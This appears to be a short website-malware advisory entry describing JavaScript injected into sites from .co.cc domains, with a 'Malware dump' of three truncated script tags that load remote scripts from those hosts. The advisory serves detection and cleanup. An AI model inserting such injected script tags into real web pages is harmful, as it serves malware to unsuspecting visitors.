Description: JavaScript included from a .co.cc domain, used to distribute malware.
Domains used:
Affecting: Any web site (no traffic specified)
Clean up: Malware is generally hidden behind a base64-encoded block in PHP. Contact support@sucuri.net if you have questions or want us to clean it up for you.
Malware dump:
<script type=''text/javascript`` src='"'http://aiqoiwdd.co.cc/50..
<script type=''text/javascript`` src='"'http://www.ironydon.co.cc/main.js?global..
<script type=''text/javascript`` src='"'http://oiwdd.co.cc/50..